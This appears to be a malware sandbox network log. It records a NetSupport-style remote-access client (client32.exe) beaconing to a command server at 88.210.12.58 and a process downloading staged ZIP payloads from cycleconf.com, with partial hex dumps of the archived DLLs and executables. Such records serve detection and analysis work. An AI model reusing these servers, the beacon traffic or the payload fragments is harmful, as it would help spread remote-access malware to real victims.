Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 10, 2024 08:58:22.262923956 CET | 1.1.1.1 | 192.168.2.5 | 0x9e4d | No error (0) | cycleconf.com | (none) | 23.254.224.41 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 08:58:35.804672956 CET | 1.1.1.1 | 192.168.2.5 | 0x718b | No error (0) | ganeres1.com | (none) | 88.210.12.58 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 08:58:36.028695107 CET | 1.1.1.1 | 192.168.2.5 | 0x35b2 | No error (0) | geo.netsupportsoftware.com | (none) | 104.26.0.231 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 08:58:36.028695107 CET | 1.1.1.1 | 192.168.2.5 | 0x35b2 | No error (0) | geo.netsupportsoftware.com | (none) | 172.67.68.212 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 08:58:36.028695107 CET | 1.1.1.1 | 192.168.2.5 | 0x35b2 | No error (0) | geo.netsupportsoftware.com | (none) | 104.26.1.231 | A (IP address) | IN (0x0001) | false
• cycleconf.com
• 88.210.12.58 connection: keep-alive cmd=poll info=1 ack=1
• geo.netsupportsoftware.com
• 88.210.12.58 connection: keep-alive cmd=enc des=1 data=u2hr4]%y-=id3wi7?=@ff&t[6ralqzd-ed#rtr5=ifp">0mqyz8a1v{r?(+he<kua]&k=jwe*9w_z8a ]
• 88.210.12.58 connection: keep-alive cmd=enc des=1 data=l3<(t{evk9|||$(m$czen>j"bml`
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49865 | 88.210.12.58 | 3785 | 828 | C:\Users\user\AppData\Local\DNScache\client32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 08:58:36.088915110 CET | 216 | OUT | POST http://88.210.12.58/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: 88.210.12.58
Connection: Keep-Alive
CMD=POLL
INFO=1
ACK=1
Dec 10, 2024 08:58:37.210413933 CET | 224 | IN | HTTP/1.1 200 OK
Server: NetSupport Gateway/1.92 (Windows NT)
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Connection: Keep-Alive
CMD=ENC
DES=1
DATA=g+${ \W[R7)^\d8=M`sM6
Dec 10, 2024 08:58:37.212775946 CET | 426 | OUT | POST http://88.210.12.58/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 232
Host: 88.210.12.58
Connection: Keep-Alive
CMD=ENC
DES=1
DATA=u2hr4]%y-=ID3Wi7?=@Ff&t[6raLqZD-eD#rtr5=Ifp">0MQYz8A1V{r?(+hE<KuA]&k=JwE*9W_z8A ]
Dec 10, 2024 08:58:37.603517056 CET | 309 | IN | HTTP/1.1 200 OK
Server: NetSupport Gateway/1.92 (Windows NT)
Content-Type: application/x-www-form-urlencoded
Content-Length: 154
Connection: Keep-Alive
CMD=ENC
DES=1
DATA=u2hr \WhE=I=n~2I[=I_T&=n&Z=n#Lqf3m#VWi6%<o`/$aOUw7?=@|-%
Dec 10, 2024 08:58:37.804897070 CET | 270 | OUT | POST http://88.210.12.58/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 88.210.12.58
Connection: Keep-Alive
CMD=ENC
DES=1
DATA=l3<(T{EVk9|||$(m$CZeN>j"Bml`


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49869 | 104.26.0.231 | 80 | 828 | C:\Users\user\AppData\Local\DNScache\client32.exe

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 08:58:36.205456018 CET | 118 | OUT | GET /location/loca.asp HTTP/1.1
                                                                                                          Host: geo.netsupportsoftware.com
                                                                                                          Connection: Keep-Alive
                                                                                                          Cache-Control: no-cache
Dec 10, 2024 08:58:37.633193970 CET | 986 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Tue, 10 Dec 2024 07:58:37 GMT
                                                                                                          Content-Type: text/html; Charset=utf-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Ray: 8efbb0da1e3d32fc-EWR
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Cache-Control: private
                                                                                                          Set-Cookie: ASPSESSIONIDSAQDRQAT=BMPGNGJDFOEKOPBFHPOKNOFL; path=/
                                                                                                          cf-apo-via: origin,host
                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M3ioDah2ZJKU1puf%2BeFi9n30GzkZ02qSJ0T9z6GpzOgGX4hkFODmWXl8vo8kBGSCPOBorjkHDKnolMDokV73AvBA8bfj90nlvbsQHC8CZ0fHlbboFtbm21LESnD%2Ff7wZtbC9cWd83x3acAvt"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1809&min_rtt=1809&rtt_var=904&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 31 30 0d 0a 34 30 2e 37 33 35 37 2c 2d 37 34 2e 31 37 32 34 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 1040.7357,-74.17240


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49831 | 23.254.224.41 | 443 | 2972 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-10 07:58:24 UTC | 55 | OUT | GET /dwnld/2nd2_1.zip HTTP/1.1
                                                                                                          Host: cycleconf.com
2024-12-10 07:58:24 UTC | 262 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Tue, 10 Dec 2024 07:58:24 GMT
                                                                                                          Server: Apache
                                                                                                          Upgrade: h2,h2c
                                                                                                          Connection: Upgrade, close
                                                                                                          Last-Modified: Wed, 24 Jul 2024 21:12:22 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 41029
                                                                                                          Vary: Accept-Encoding
                                                                                                          Content-Type: application/zip
2024-12-10 07:58:24 UTC | 41029 (six IN chunks: 7930, 8000, 8000, 8000, 8000, 1099) | IN | ZIP payload beginning with a PK local file header; first archive entry name: msauserext.dll (raw hex and ASCII dumps not reproduced here)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49837 | 23.254.224.41 | 443 | 2972 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-10 07:58:26 UTC | 55 | OUT | GET /dwnld/2nd2_2.zip HTTP/1.1
                                                                                                          Host: cycleconf.com
2024-12-10 07:58:26 UTC | 264 | IN | HTTP/1.1 200 OK
                                                                                                          Date: Tue, 10 Dec 2024 07:58:26 GMT
                                                                                                          Server: Apache
                                                                                                          Upgrade: h2,h2c
                                                                                                          Connection: Upgrade, close
                                                                                                          Last-Modified: Wed, 24 Jul 2024 21:12:30 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 1397545
                                                                                                          Vary: Accept-Encoding
                                                                                                          Content-Type: application/zip
2024-12-10 07:58:26 UTC | 39928 shown of 1397545 (IN chunks: 7928, 8000, 8000, 8000, 8000) | IN | ZIP payload beginning with a PK local file header; first archive entry name: mscpxl32.dLL (raw hex and ASCII dumps not reproduced here)
                                                                                                          Data Ascii: 5["+W%7?V_%4rr#&taVb5fGCyCNC:W\<r=Wou@l{1D>Kv3@4Qfcty3kVCIzf3e^GJT;^o]ZmElUn7o[I[f\$h4/>(/Y"
                                                                                                          2024-12-10 07:58:27 UTC8000INData Raw: 19 0b 24 8f 93 3a 5b 94 48 5d b4 8b 48 5d 99 71 ec e2 3b 4c e6 b5 b0 f8 b7 6b 84 4e 95 9e 20 0e 3d e3 19 f6 cb 7f 3a 0c 3c 2d 9d bb fc 0e ce 8b aa 33 e4 1e e1 24 9e ea b5 7d 10 28 f2 e2 3d 87 87 5a 68 3b d8 16 5d a0 71 b3 b0 5c fc c8 f8 c5 07 57 e3 f6 c7 17 c7 e4 e3 90 e0 86 2f 03 fd 59 06 59 93 1d 50 0e 51 dd 90 94 cc b8 a3 18 d7 17 68 41 45 43 e5 69 56 75 9a 55 9e 64 f7 54 18 5a 9c ae 16 fb 3e 58 c8 f7 a1 8a c9 c5 de 65 de 1c 74 a4 a6 1c 5a 5a bb 4f 08 64 44 ed b2 91 fb f1 d7 69 64 89 55 ca 30 d5 0f f1 a9 be 2b 69 aa af 3b 4a 53 1d b7 f9 e4 fe 7f 51 a7 fa 7e f9 c5 4f f9 ed af d0 83 05 df 6c aa e3 06 89 a3 13 35 b1 df 88 5c bd 96 41 e4 aa f3 ec 2c 45 dd eb cb f9 7b 12 c7 ab d9 0f b2 4f 6c 5f a8 b2 cd 00 96 ee 94 ff 7c 8c e6 4d 9f 2b 42 43 4b ac 96 f9 99
                                                                                                          Data Ascii: $:[H]H]q;LkN =:<-3$}(=Zh;]q\W/YYPQhAECiVuUdTZ>XetZZOdDidU0+i;JSQ~Ol5\A,E{Ol_|M+BCK
                                                                                                          2024-12-10 07:58:27 UTC8000INData Raw: 6e d7 23 bd f4 5d 9e 5e 0e f3 a1 f2 d5 37 fa 46 6d 56 e4 96 6b 53 1e af 37 63 74 6f 3a 12 1f 64 23 7d 06 4b e2 f4 17 85 54 f0 36 25 c3 6b 73 c4 48 88 c3 a4 92 60 4b 2f 12 94 94 7f 67 72 fe 35 8e de 24 c8 d2 87 04 25 e5 df 95 9c df e9 e8 43 02 af 4e 51 7e a8 73 64 1c 44 34 19 c4 c0 04 10 96 48 65 bb 5b b2 9f c6 3b 04 25 47 27 d4 c9 77 5b 42 85 38 53 9d 54 9f 7d c9 c0 1a a7 25 92 74 56 6c 75 fa ae ee dd a2 a4 fc 47 92 f3 2f 9d d6 ab 3f 46 f4 ed 8f 78 e6 63 c9 99 27 4e 4b 5a d2 8c 96 d4 4b 5a 52 f9 ef 25 83 10 7a 97 7f fb d7 8c c7 a9 5e ed 9f da 7b 49 fb 9a fc a7 7b b5 bf 77 fe f4 af c9 ff 8f e4 fc c5 3c bf 79 6b 02 42 98 7a 21 44 3c f3 d9 e4 cc 86 a9 49 fd 77 e7 37 e9 bf ce 5e ed bf af 0f 3e 0e 4c 89 8f d9 6c 0a 7a 23 d0 2e c2 95 ec e7 f8 dd 21 74 e1 ab 0c
                                                                                                          Data Ascii: n#]^7FmVkS7cto:d#}KT6%ksH`K/gr5$%CNQ~sdD4He[;%G'w[B8ST}%tVluG/?Fxc'NKZKZR%z^{I{w<ykBz!D<Iw7^>Llz#.!t
                                                                                                          2024-12-10 07:58:27 UTC8000INData Raw: 41 13 72 47 1d 0f f9 00 94 c0 5d 50 eb 69 bc a3 90 27 8a 38 9e 69 32 4a 35 43 a9 55 4d ed 0e 79 1b ee 1f f6 3d 87 83 68 1d db e7 0e f7 c2 dc 64 2a f7 cb 35 63 7b da 2b f5 36 56 12 66 4a d6 de e6 90 07 fc 01 f6 59 81 56 b8 cc 4e ea af d5 63 13 d4 5f 68 bb 07 5b ae 14 ed 9d 39 55 e4 7c a9 29 41 5f e6 94 74 4b 31 2a b7 3e b1 9c 93 95 c4 2f 84 da 3c 5e ad 05 ab 26 3b 37 9b 64 d4 97 45 e5 36 27 96 cb 62 25 59 b8 73 c4 f0 26 5a 4b 42 9d 3d e6 b3 01 22 87 40 d4 27 82 c8 61 0f e4 00 ca 59 c9 1a 3b a1 d1 45 68 f8 7d 49 78 b9 04 6f 6f 22 bc 5c 56 92 0b 28 e5 51 9c 4a 11 8b 95 55 08 07 1e cc 6f f5 e8 da e2 2c 1d 76 96 94 04 6f 14 c1 3b 9e 08 6f 14 2b 19 f5 7f 0c 6f 34 c1 eb 48 84 37 9a 95 8c 06 78 df 14 1e 5b 00 4e 0e c6 a2 b9 34 e4 5c 1d 72 3c 6c 0f eb 7f f2 d5 db
                                                                                                          Data Ascii: ArG]Pi'8i2J5CUMy=hd*5c{+6VfJYVNc_h[9U|)A_tK1*>/<^&;7dE6'b%Ys&ZKB="@'aY;Eh}Ixoo"\V(QJUo,vo;o+o4H7x[N4\r<l
                                                                                                          2024-12-10 07:58:27 UTC8000INData Raw: 85 28 8d 07 98 0b d3 07 48 68 0d 32 1e bf e5 ad f8 72 22 bd b4 47 96 8f 34 87 47 41 a9 7c d7 89 84 b0 9b 18 8d dd d5 96 ef e2 f9 ae 4e 8b ab 4b 4f 6b 83 a6 40 9f 8d c3 ee a8 58 cf 86 8d 87 1f 41 ab 17 7d 04 e1 d9 a4 5a 76 dc a3 56 ac c7 46 38 ec d8 88 f5 01 8c 97 52 b9 c6 a7 bb 9e ab 58 8b a3 e5 4d 0a a0 89 e1 17 cd 57 f4 0e bf a8 cf 7f b2 a0 24 97 e1 16 fc a4 b8 c0 01 a5 ac 4b 84 05 66 9d 91 8b 5a e8 1b 01 fe c6 c0 81 c2 2e 2e 7c 2d 9e 24 a0 b9 76 70 8c 7c ab 0d 1d 43 1f 86 66 fa 45 d4 60 34 09 10 fc c7 a7 5f 8d 8c 74 59 c2 b3 e5 b9 13 0d 8d 31 6b 8d 1e 0b 7f 3d 01 46 51 4f 18 b3 e2 40 e4 d2 89 14 88 43 57 9e 7d 10 20 cd 19 cc 28 78 78 cb 27 d4 cc 14 59 b5 fe 14 fa f6 0c 04 ef d0 b2 b7 e3 cf 56 78 d9 70 0a 5f aa 65 a7 3c 01 0c a0 b4 1b 1e 21 75 ef a9 9c
                                                                                                          Data Ascii: (Hh2r"G4GA|NKOk@XA}ZvVF8RXMW$KfZ..|-$vp|CfE`4_tY1k=FQO@CW} (xx'YVxp_e<!u
                                                                                                          2024-12-10 07:58:27 UTC8000INData Raw: d2 44 21 a5 bc cb ee b6 a9 d1 35 a4 48 d8 49 cb c6 3b 98 48 ea 83 fc 28 c9 c0 2a 0a 7e f9 54 1c a0 05 53 dd 9e 84 65 c6 ab bd a3 2f 33 6c b2 cc 6a b6 09 3e 1c fd 03 89 dd 5b a9 c6 4d 99 84 cd 9f b7 a4 49 ea ba 8d d8 30 79 83 48 da 08 49 2c ba 05 5b 9c 94 57 21 41 9c 4f 82 d7 41 89 07 6d c4 5b d1 d5 bd 1f e7 de c3 7d 2d cb 5f 53 0d b3 2c 54 b7 09 ac 70 4d ee 3b f7 99 d5 22 f7 64 c8 4d 76 35 ee 2f 28 b0 47 2f 70 37 ae fa 2f 1a fd 44 05 70 37 22 bf 28 1a f4 e3 e7 a1 41 99 b0 09 81 e9 ba 5f 6b d1 61 f5 30 3b 7a 68 b5 81 aa 10 ba 3d 20 72 04 1d 5a 76 2e 76 a2 8a 22 3c db d1 8a 5d be 97 45 8f 92 9e e6 38 3d 29 ea 12 7c 47 65 f2 cf 22 6c 25 ba 94 de d7 c0 27 d4 e3 4a ae 67 90 5e 4f 54 14 c3 ac 6c 1d 66 0d 0e 76 43 cb 03 1e 6f 50 d2 c7 ae dd 1b 79 b8 af 3b 4c 87
                                                                                                          Data Ascii: D!5HI;H(*~TSe/3lj>[MI0yHI,[W!AOAm[}-_S,TpM;"dMv5/(G/p7/Dp7"(A_ka0;zh= rZv.v"<]E8=)|Ge"l%'Jg^OTlfvCoPy;L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49851 | 23.254.224.41 | 443 | 2972 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 07:58:30 UTC | 55 | OUT | GET /dwnld/2nd2_3.zip HTTP/1.1
Host: cycleconf.com
2024-12-10 07:58:31 UTC | 262 | IN | HTTP/1.1 200 OK
Date: Tue, 10 Dec 2024 07:58:31 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Wed, 24 Jul 2024 21:13:01 GMT
Accept-Ranges: bytes
Content-Length: 64489
Vary: Accept-Encoding
Content-Type: application/zip
                                                                                                          2024-12-10 07:58:31 UTC7930INData Raw: 50 4b 03 04 14 00 00 00 08 00 65 1f 9b 48 27 d4 1e 84 38 1f 00 00 78 49 00 00 0b 00 00 00 50 43 49 43 48 45 4b 2e 44 4c 4c ec 39 79 5c 53 c7 d6 73 93 80 61 11 52 d9 dc d0 40 a5 8a 28 dc 9b 0b 28 0a ca 16 95 16 34 25 08 2e a8 84 e4 02 91 6c bd 37 41 b0 5a 65 71 a1 11 b5 75 f7 f5 ab 58 a5 b5 4a 6b 17 17 5a 6b c5 a5 fa 6c b5 7d da be aa 75 6f ad e2 d2 aa cf d6 a5 5a f3 ce 4c 02 82 5b db 3f de ef fb 7d ef 73 70 e6 cc 59 e7 cc 99 99 33 73 63 c6 98 f9 48 8c 10 92 40 75 38 10 6a 40 ce 92 88 fe b8 9c 82 ea d3 fd 63 1f b4 c1 63 7f 48 03 95 be 3f 24 ab 48 2f c8 2d bc b9 90 d7 18 e5 5a 8d c9 64 b6 ca f3 39 39 6f 33 c9 f5 26 79 ea 08 b5 dc 68 d6 71 91 ed db 7b f6 70 d9 10 4a 3c b7 f4 0b d2 35 35 d7 3e 2f df 6c 8a 21 f0 cb a6 68 80 83 cc 37 9a 68 c2 e3 9a 7c 09 fd f3
                                                                                                          Data Ascii: PKeH'8xIPCICHEK.DLL9y\SsaR@((4%.l7AZequXJkZkl}uoZL[?}spY3scH@u8j@ccH?$H/-Zd99o3&yhq{pJ<55>/l!h7h|
                                                                                                          2024-12-10 07:58:31 UTC8000INData Raw: 51 ae fd ac 2a b8 c5 c6 da 66 87 5f ae a4 fc 63 5d ab 0f e4 ac 90 86 0e 13 7b 44 0c ec 1a 08 0e 08 ab 57 06 6b 13 e4 b8 55 2f f7 1a f8 fb d1 e5 07 a4 dc e5 0a b0 6b e3 13 a4 e8 ed 7e ef 3f de b0 0a b5 28 e1 83 67 b4 c5 fb 5e 38 3a 74 05 8a 3c 97 3f 74 30 44 20 8a 71 e5 fa 90 46 93 d0 d3 07 8c e9 3f f0 f8 0f 50 4b 03 04 14 00 00 00 08 00 24 a0 cd 56 00 ef 64 fe d7 7f 00 00 58 f7 00 00 0e 00 00 00 72 65 6d 63 6d 64 73 74 75 62 2e 65 78 65 ed fd 0b 40 54 55 d7 30 8e 9f b9 00 03 0c ce a8 a0 a8 a8 a3 e2 2d bc 0c 0c f7 19 60 50 06 31 41 47 91 41 54 54 12 10 08 81 e0 0c 6a 79 01 07 8c e1 38 69 a5 d5 d3 e5 49 53 cb d2 ca 32 2f 95 1a 88 81 a6 95 77 2d ad b0 4c 0f 8d 25 a6 29 2a 72 fe 6b ed 73 06 06 b5 9e e7 7d be ff fb 7d ef f7 fd 1a dd 67 df d6 de 7b ed b5 d7 5e
                                                                                                          Data Ascii: Q*f_c]{DWkU/k~?(g^8:t<?t0D qF?PK$VdXremcmdstub.exe@TU0-`P1AGATTjy8iIS2/w-L%)*rks}}g{^
                                                                                                          2024-12-10 07:58:31 UTC8000INData Raw: e4 cb 92 ef 11 f2 dd 43 be b8 b8 61 f7 7f 03 9f 89 37 d0 bf 06 fc 20 c1 03 d8 98 1b ed 12 fc c7 eb 20 c1 f7 6e 43 bd 56 da 83 a9 c4 f3 42 ec e4 96 83 5c 53 98 27 45 dd 8c 97 eb cd b3 4c 6c 01 9e 1c 7d b2 ee 1c bf aa ec 63 69 69 a3 7b a0 2a 6b 7f a6 b9 b6 cd a5 f6 82 ab 44 be 03 bb 17 6a a1 dc 8c f5 5f 66 7e 05 e1 7a 21 9c 37 c0 35 f6 87 ee 50 db e8 2a 91 da 04 a8 fd 37 f5 fe 65 8a ca 27 c8 91 98 f6 1b 45 c5 3c 70 55 77 17 56 71 36 b2 8a b3 ed 86 6f d5 da ab f0 ad 38 ae a8 78 06 04 f8 58 cd 4d eb 6b b8 5a 8b d8 81 80 8a 95 8b 20 d0 36 a6 51 37 6d 81 42 b1 6f bf 62 5f 99 2f 8c 78 96 46 05 72 8a 62 5f 45 6d 38 78 f3 dc 6a 5b a4 69 d6 ca 95 90 42 5b ab 78 5a 05 69 38 ff ca a7 c7 03 a4 0d c9 06 b4 ad 22 14 26 74 db 41 e8 b9 83 50 72 07 a1 f0 0e a4 64 53 93 3b
                                                                                                          Data Ascii: Ca7 nCVB\S'ELl}cii{*kDj_f~z!75P*7e'E<pUwVq6o8xXMkZ 6Q7mBob_/xFrb_Em8xj[iB[xZi8"&tAPrdS;
                                                                                                          2024-12-10 07:58:31 UTC8000INData Raw: 75 39 e7 0b 1d 92 6c 43 a3 5d 4f b5 8f 35 1b 2e 82 6f 03 8b 9f 2b f8 69 b6 3b 5f 3a 62 bc 12 3f d0 53 a6 08 a3 14 66 de d7 1e bf 29 97 98 65 96 1a b9 b6 be f8 ca e3 87 e4 92 24 d9 2c 6d 6d 89 0b 46 8b b1 51 b9 90 2b 76 c7 dd 74 d4 45 61 11 57 bf 6f da a7 01 67 c9 ba c6 73 d9 04 da 87 a9 cb 13 a7 05 d4 d2 03 c1 c8 c0 80 db 3c 96 9d b2 07 95 1a 00 10 f5 70 71 f8 c2 a5 f8 3e 44 71 3d 7e ec 29 dc 82 99 cc 09 fe 65 40 5b 91 8c 71 b5 4f 66 ea 2c ac 82 0e b2 b0 ae f4 80 04 ba 1b 6b aa 6d 1f 37 6f d7 c0 88 fb f1 3e c4 69 3d 7e ec 3d f6 61 45 d7 e3 c7 ee b1 0f ab ba 1e 3f 0d 86 8b fc 26 37 41 dc 6a 68 d4 d4 58 96 34 8a 14 15 a7 c9 e1 6a a3 d9 2d 4f c2 de 42 3d 17 c3 45 5c a2 8e b7 43 f1 f8 e2 52 ab e5 ae 8c f6 80 1a c1 dc e8 ae d4 dc 87 99 34 c7 9a 74 d2 3a 6e 0e
                                                                                                          Data Ascii: u9lC]O5.o+i;_:b?Sf)e$,mmFQ+vtEaWogs<pq>Dq=~)e@[qOf,km7o>i=~=aE?&7AjhX4j-OB=E\CR4t:n
                                                                                                          2024-12-10 07:58:31 UTC8000INData Raw: 35 31 17 17 03 6e 3c 5d c6 67 52 d4 09 69 4a 41 0e 01 c9 34 2c 9c 9b 55 84 b5 06 86 c2 ec a8 4d d8 9e 7f 1e 0d f5 88 cb 7a cc 3c 6f 5e 56 b1 11 98 1e ab 5c 23 9d 9a 55 3c 3f b7 a0 83 5d 40 a0 38 95 eb 08 ec ea 92 9a 9b 99 35 36 27 a3 78 6a 21 61 bf 31 8b e8 2c 6a a4 24 71 6c 52 46 11 df fe 80 f1 3c 49 7b dc d4 42 47 02 ea 37 a0 16 94 3f 16 58 3f 77 6e 46 7e b2 43 25 22 42 92 98 95 51 9a f5 40 b8 14 f0 14 ca 2d 2c 8e cf c2 b3 db 2c 07 be bd 44 ce 07 94 de 0f f6 41 c0 22 83 f4 f4 07 f9 33 95 fa 16 6b f6 b0 08 aa 10 29 c7 53 7e 6c a1 19 79 e1 27 e0 11 40 0c da fd c9 fb 51 8c 2d c8 4c 2e ca 2d e0 01 af 63 9e 58 fa d4 45 45 59 d4 5c be b7 64 14 d3 e6 22 64 c1 54 ea 18 b4 79 7e 16 fd 40 35 bf 24 dc cb f7 54 8a 7a 4b 32 d9 9c 55 bc c8 98 55 4c 58 b9 60 2e 8f 06
                                                                                                          Data Ascii: 51n<]gRiJA4,UMz<o^V\#U<?]@856'xj!a1,j$qlRF<I{BG7?X?wnF~C%"BQ@-,,DA"3k)S~ly'@Q-L.-cXEEY\d"dTy~@5$TzK2UULX`.
                                                                                                          2024-12-10 07:58:31 UTC8000INData Raw: f0 b6 be 3c 51 ba 71 8f fe bd 88 37 bf d3 8b 1b 23 cd 6d 51 4b 52 d6 cc b8 36 d1 7f f1 c1 dd d3 7a 7d 51 f3 ed be 69 dd 5f be e4 77 f9 58 ad b6 39 7d d5 78 d9 80 7f 1e bd be ef f4 c9 ec 49 33 8b 43 9f aa 5b 7e e2 25 d9 9a f7 b7 c4 4d f2 6d f0 fe b6 c7 07 fd 82 ba 74 0b af d9 a1 2b bd 62 36 52 2a 69 d7 5e bf d6 73 3f 4c 6c 93 95 0f 0d 9c f4 04 5d 20 91 17 0d 2d 4f c9 7b 79 ec 73 1b 97 9d bb 17 f3 79 cf 7e b1 9f 7e c5 be b5 6c e5 da db f7 96 b5 64 54 59 a9 68 ce 53 74 ee de a9 1d 1b 2f 3e db f5 3f 3c 90 5b f2 d9 b3 67 de ca 9f 3e 2e 3b ee a9 d5 27 9f 59 5d 1c bb aa e7 fe ff ab 0f e4 1c 53 05 e3 b6 3f 7e 98 fd ae e6 7c 5d f2 b4 69 7b f6 77 37 3f a5 ea 3b f5 8b 4f 62 8c 31 9f 54 df 78 dc 7d 6e cd 8c 74 e6 b4 b9 77 c9 5e 86 1b 77 cd e7 fc e4 1e 83 7a 05 5d 2a
                                                                                                          Data Ascii: <Qq7#mQKR6z}Qi_wX9}xI3C[~%Mmt+b6R*i^s?Ll] -O{ysy~~ldTYhSt/>?<[g>.;'Y]S?~|]i{w7?;Ob1Tx}ntw^wz]*
                                                                                                          2024-12-10 07:58:31 UTC8000INData Raw: 4a 2e d3 1c fd 50 74 b4 52 03 e3 23 72 5f aa 1f 36 76 9b 0f e6 c5 1a 8e 59 a2 c9 e9 a3 cf fc 3a 39 13 53 85 c4 d4 a4 31 f9 52 a1 58 92 c2 9c 9c 10 93 c2 ea 87 19 20 56 9a be 36 9b 83 b1 59 f6 23 b9 76 1c cc 96 45 68 64 86 34 ca 35 f0 15 c5 3e e5 d3 6e e6 ff d0 df de 7e e8 91 e4 5d 17 a5 e4 55 58 10 62 18 4c 0d c0 c6 63 7e e5 63 cb 7d e6 7b c5 4b 24 a9 8e 36 36 19 19 19 d6 c9 5d dd 5a c3 fb b8 4d ea cc 84 94 d4 34 9b 18 71 92 0d d4 07 ae 62 b8 86 e1 f2 45 ab 37 12 81 d1 98 fd 68 8c 67 0d e9 98 a0 6b cc 24 12 75 0a 16 88 4d ea aa 63 e4 f9 3e ff b0 03 38 ac b4 7f d0 85 04 d3 42 8a eb 93 48 9d 54 32 06 7a 6d 66 4a 3e 99 04 b8 e4 f9 8d b3 18 2f f7 4b f6 8f a8 67 18 ee bb 7d a9 dd 76 f3 9a 3d 3f fd 5a a2 61 60 9d 70 74 e3 c9 4b 5f b6 b0 c3 c6 3c 48 9e 10 55 5e
                                                                                                          Data Ascii: J.PtR#r_6vY:9S1RX V6Y#vEhd45>n~]UXbLc~c}{K$66]ZM4qbE7hgk$uMc>8BHT2zmfJ>/Kg}v=?Za`ptK_<HU^
                                                                                                          2024-12-10 07:58:31 UTC8000INData Raw: 8d c2 0b 44 39 0f 52 79 6c 77 2d 54 44 e1 29 62 0b 25 4b 7e 68 5b 0f 31 6f 8f c1 3b 8d 66 d1 62 78 60 38 45 96 b5 12 07 b6 22 4a 58 36 5e 52 b1 99 b6 ad 9a 84 b6 32 66 57 59 78 37 b4 f4 80 ee 64 85 69 26 27 5d 4e 8a 22 e5 ec 95 64 0c 48 fd 0c de 34 d1 30 97 c2 53 34 19 9a d2 8f 3e 80 20 a4 36 93 76 97 76 91 21 e0 73 08 fa 27 c0 cc e4 b8 cb 71 91 ba 6c c9 3c ca ec 60 0f b0 bd 6c c5 ad 4d 40 d1 20 39 51 f4 01 0a c6 86 cf fb c3 05 8f 92 22 42 d3 23 0b d9 e9 39 19 91 19 04 ee f8 a1 3d 70 95 c9 88 58 aa ab 07 aa c0 42 74 40 11 fb c5 57 0c 74 15 c9 c4 a8 73 a3 d6 e7 d1 a1 0f 9d 0d 73 dd 2c 98 1b 60 30 b7 4b 87 b9 6b 0a c8 13 e7 eb 56 e3 85 fa 7c bc 30 e0 e2 05 25 01 2f cc a6 e3 85 55 0c 28 56 2d a0 54 d2 e1 99 00 59 5f 84 97 e4 f5 a5 74 68 ab 4a eb 97 40 18 37
                                                                                                          Data Ascii: D9Rylw-TD)b%K~h[1o;fbx`8E"JX6^R2fWYx7di&']N"dH40S4> 6vv!s'ql<`lM@ 9Q"B#9=pXBt@Wtss,`0KkV|0%/U(V-TY_thJ@7
                                                                                                          2024-12-10 07:58:31 UTC559INData Raw: 00 20 00 00 00 00 00 00 00 50 43 49 43 48 45 4b 2e 44 4c 4c 0a 00 20 00 00 00 00 00 01 00 18 00 00 03 cc 01 20 a0 d1 01 61 c9 ee ed 5b 37 da 01 cd 15 5c 8c 17 35 da 01 50 4b 01 02 1f 00 14 00 00 00 08 00 24 a0 cd 56 00 ef 64 fe d7 7f 00 00 58 f7 00 00 0e 00 24 00 00 00 00 00 00 00 20 00 00 00 61 1f 00 00 72 65 6d 63 6d 64 73 74 75 62 2e 65 78 65 0a 00 20 00 00 00 00 00 01 00 18 00 2a 32 6a a6 18 9e d9 01 85 83 92 f3 5b 37 da 01 9a b4 5c 8c 17 35 da 01 50 4b 01 02 1f 00 14 00 00 00 08 00 19 92 38 57 f5 75 1d 3a 91 01 00 00 7d 02 00 00 0c 00 24 00 00 00 00 00 00 00 20 00 00 00 64 9f 00 00 63 6c 69 65 6e 74 33 32 2e 69 6e 69 0a 00 20 00 00 00 00 00 01 00 18 00 30 ba bb 24 fa ee d9 01 6a 23 97 b5 5b 37 da 01 e5 1a 6e 1e 72 ee d9 01 50 4b 01 02 